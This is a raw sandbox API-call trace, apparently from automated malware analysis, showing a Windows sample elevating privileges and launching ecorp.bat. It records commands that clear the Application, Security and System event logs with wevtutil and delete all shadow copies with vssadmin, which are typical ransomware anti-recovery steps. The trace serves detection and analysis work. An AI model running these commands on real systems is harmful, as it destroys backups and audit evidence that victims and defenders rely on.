0x0 [0076.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 141 os_tid = 0x81c Thread: id = 148 os_tid = 0xa40 [0089.380] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0089.383] ShellExecuteExW (in: pExecInfo=0x2311b00*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl Application", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2311b00*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl Application", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x434)) returned 1 [0089.409] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd820*=0x414, lpdwindex=0x1c41ef94 | out: lpdwindex=0x1c41ef94) returned 0x0 [0089.425] CoGetContextToken (in: pToken=0x1c41f270 | out: pToken=0x1c41f270) returned 0x0 [0089.425] CoUninitialize () Thread: id = 150 os_tid = 0xb0 [0089.444] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0089.445] ShellExecuteExW (in: pExecInfo=0x2311f90*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl Security", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2311f90*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl Security", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x450)) returned 1 [0089.463] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd870*=0x428, lpdwindex=0x1b08f414 | out: lpdwindex=0x1b08f414) returned 0x0 [0089.480] CoGetContextToken (in: pToken=0x1b08f6f0 | out: pToken=0x1b08f6f0) returned 0x0 [0089.480] CoUninitialize () Thread: id = 152 os_tid = 0xa14 [0089.563] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0089.564] ShellExecuteExW (in: pExecInfo=0x2312420*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl System", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2312420*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="cmd.exe /C wevtutil.exe cl System", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x46c)) returned 1 [0089.582] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd8c0*=0x444, lpdwindex=0x1b0aee44 | out: lpdwindex=0x1b0aee44) returned 0x0 [0089.732] CoGetContextToken (in: pToken=0x1b0af120 | out: pToken=0x1b0af120) returned 0x0 [0089.732] CoUninitialize () Thread: id = 160 os_tid = 0xb30 [0091.363] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0091.364] ShellExecuteExW (in: pExecInfo=0x231a380*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x231a380*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x488)) returned 1 [0091.385] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd910*=0x470, lpdwindex=0x1c4df404 | out: lpdwindex=0x1c4df404) returned 0x0 [0091.397] CoGetContextToken (in: pToken=0x1c4df6e0 | out: pToken=0x1c4df6e0) returned 0x0 [0091.397] CoUninitialize () Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4a297000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe delete shadows /all /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0xafc [0040.707] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f930 | out: lpSystemTimeAsFileTime=0x31f930*(dwLowDateTime=0x19950a0, dwHighDateTime=0x1d53bb2)) [0040.707] GetCurrentProcessId () returned 0xaf8 [0040.707] GetCurrentThreadId () returned 0xafc [0040.708] GetTickCount () returned 0x19d95 [0040.708] QueryPerformanceCounter (in: lpPerformanceCount=0x31f938 | out: lpPerformanceCount=0x31f938*=16097660355) returned 1 [0040.709] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000 [0040.709] __set_app_type (_Type=0x1) [0040.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0 [0040.709] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0 [0040.709] GetCurrentThreadId () returned 0xafc [0040.709] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xafc) returned 0x3c [0040.710] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0040.710] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0040.710] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0040.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.710] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f8c8 | out: phkResult=0x31f8c8*=0x0) returned 0x2 [0040.711] VirtualQuery (in: lpAddress=0x31f8b0, lpBuffer=0x31f830, dwLength=0x30 | out: lpBuffer=0x31f830*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0040.711] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31f830, dwLength=0x30 | out: lpBuffer=0x31f830*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0040.711] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31f830, dwLength=0x30 | out: lpBuffer=0x31f830*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0040.711] VirtualQuery (in: lpAddress=0x224000, lpBuffer=0x31f830, dwLength=0x30 | out: lpBuffer=0x31f830*(BaseAddress=0x224000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0040.711] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31f830, dwLength=0x30 | out: lpBuffer=0x31f830*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0040.711] GetConsoleOutputCP () returned 0x1b5 [0040.711] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0040.711] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1 [0040.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.711] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0040.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.712] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0040.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0040.712] _get_osfhandle (_FileHandle=0) returned 0x3 [0040.712] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0040.712] _get_osfhandle (_FileHandle=0) returned 0x3 [0040.712] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0040.713] GetEnvironmentStringsW () returned 0x4f8b10* [0040.713] GetProcessHeap () returned 0x4e0000 [0040.713] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4f95a0 [0040.713] FreeEnvironmentStringsW (penv=0x4f8b10) returned 1 [0040.713] GetProcessHeap () returned 0x4e0000 [0040.713] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8) returned 0x4f8390 [0040.713] GetEnvironmentStringsW () returned 0x4f8b10* [0040.713] GetProcessHeap () returned 0x4e0000 [0040.713] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4fa030 [0040.713] FreeEnvironmentStringsW (penv=0x4f8b10) returned 1 [0040.713] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e788 | out: phkResult=0x31e788*=0x44) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x18, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x1, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x1, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x0, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x40, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x40, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x40, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegCloseKey (hKey=0x44) returned 0x0 [0040.714] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e788 | out: phkResult=0x31e788*=0x44) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x40, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x1, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x1, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x0, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x9, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x4, lpData=0x31e7a0*=0x9, lpcbData=0x31e784*=0x4) returned 0x0 [0040.714] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e780, lpData=0x31e7a0, lpcbData=0x31e784*=0x1000 | out: lpType=0x31e780*=0x0, lpData=0x31e7a0*=0x9, lpcbData=0x31e784*=0x1000) returned 0x2 [0040.714] RegCloseKey (hKey=0x44) returned 0x0 [0040.714] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2d8d4b [0040.714] srand (_Seed=0x5d2d8d4b) [0040.714] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe delete shadows /all /Quiet" [0040.714] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe delete shadows /all /Quiet" [0040.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.715] GetProcessHeap () returned 0x4e0000 [0040.715] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4faac0 [0040.715] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4faad0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0040.715] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0040.715] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.715] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0040.715] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0040.715] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0040.715] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0040.715] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0040.715] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0040.715] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0040.715] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0040.715] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0040.715] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0040.715] GetProcessHeap () returned 0x4e0000 [0040.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f95a0 | out: hHeap=0x4e0000) returned 1 [0040.715] GetEnvironmentStringsW () returned 0x4f8b10* [0040.716] GetProcessHeap () returned 0x4e0000 [0040.716] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa94) returned 0x4fb780 [0040.716] FreeEnvironmentStringsW (penv=0x4f8b10) returned 1 [0040.716] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.716] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0040.716] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0040.716] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0040.716] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0040.716] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0040.716] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0040.716] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0040.716] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0040.716] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0040.716] GetProcessHeap () returned 0x4e0000 [0040.716] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x5c) returned 0x4e1320 [0040.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f590 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.716] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f590, lpFilePart=0x31f570 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f570*="Desktop") returned 0x25 [0040.716] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0040.716] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f2a0 | out: lpFindFileData=0x31f2a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdb0000db, cFileName="Users", cAlternateFileName="")) returned 0x4f8970 [0040.716] FindClose (in: hFindFile=0x4f8970 | out: hFindFile=0x4f8970) returned 1 [0040.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f2a0 | out: lpFindFileData=0x31f2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdb0000db, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4f8970 [0040.717] FindClose (in: hFindFile=0x4f8970 | out: hFindFile=0x4f8970) returned 1 [0040.717] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0040.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f2a0 | out: lpFindFileData=0x31f2a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdb0000db, cFileName="Desktop", cAlternateFileName="")) returned 0x4f8970 [0040.717] FindClose (in: hFindFile=0x4f8970 | out: hFindFile=0x4f8970) returned 1 [0040.717] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0040.717] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0040.717] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0040.717] GetProcessHeap () returned 0x4e0000 [0040.717] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fb780 | out: hHeap=0x4e0000) returned 1 [0040.717] GetEnvironmentStringsW () returned 0x4f8b10* [0040.717] GetProcessHeap () returned 0x4e0000 [0040.717] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4face0 [0040.717] FreeEnvironmentStringsW (penv=0x4f8b10) returned 1 [0040.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.718] GetProcessHeap () returned 0x4e0000 [0040.718] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e1320 | out: hHeap=0x4e0000) returned 1 [0040.718] GetProcessHeap () returned 0x4e0000 [0040.718] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4016) returned 0x4fcd10 [0040.718] GetProcessHeap () returned 0x4e0000 [0040.718] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x64) returned 0x4fb7d0 [0040.718] GetProcessHeap () returned 0x4e0000 [0040.718] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fcd10 | out: hHeap=0x4e0000) returned 1 [0040.718] GetConsoleOutputCP () returned 0x1b5 [0040.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0040.750] GetUserDefaultLCID () returned 0x409 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31f6a0, cchData=128 | out: lpLCData="0") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31f6a0, cchData=128 | out: lpLCData="0") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31f6a0, cchData=128 | out: lpLCData="1") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2 [0040.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0040.752] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0040.752] GetProcessHeap () returned 0x4e0000 [0040.752] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20c) returned 0x4fb8b0 [0040.752] GetConsoleTitleW (in: lpConsoleTitle=0x4fb8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0040.752] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0040.753] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0040.753] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0040.753] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0040.753] GetProcessHeap () returned 0x4e0000 [0040.753] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4012) returned 0x4fcd10 [0040.753] GetProcessHeap () returned 0x4e0000 [0040.753] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fcd10 | out: hHeap=0x4e0000) returned 1 [0040.754] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0040.754] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0040.754] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0040.754] _wcsicmp 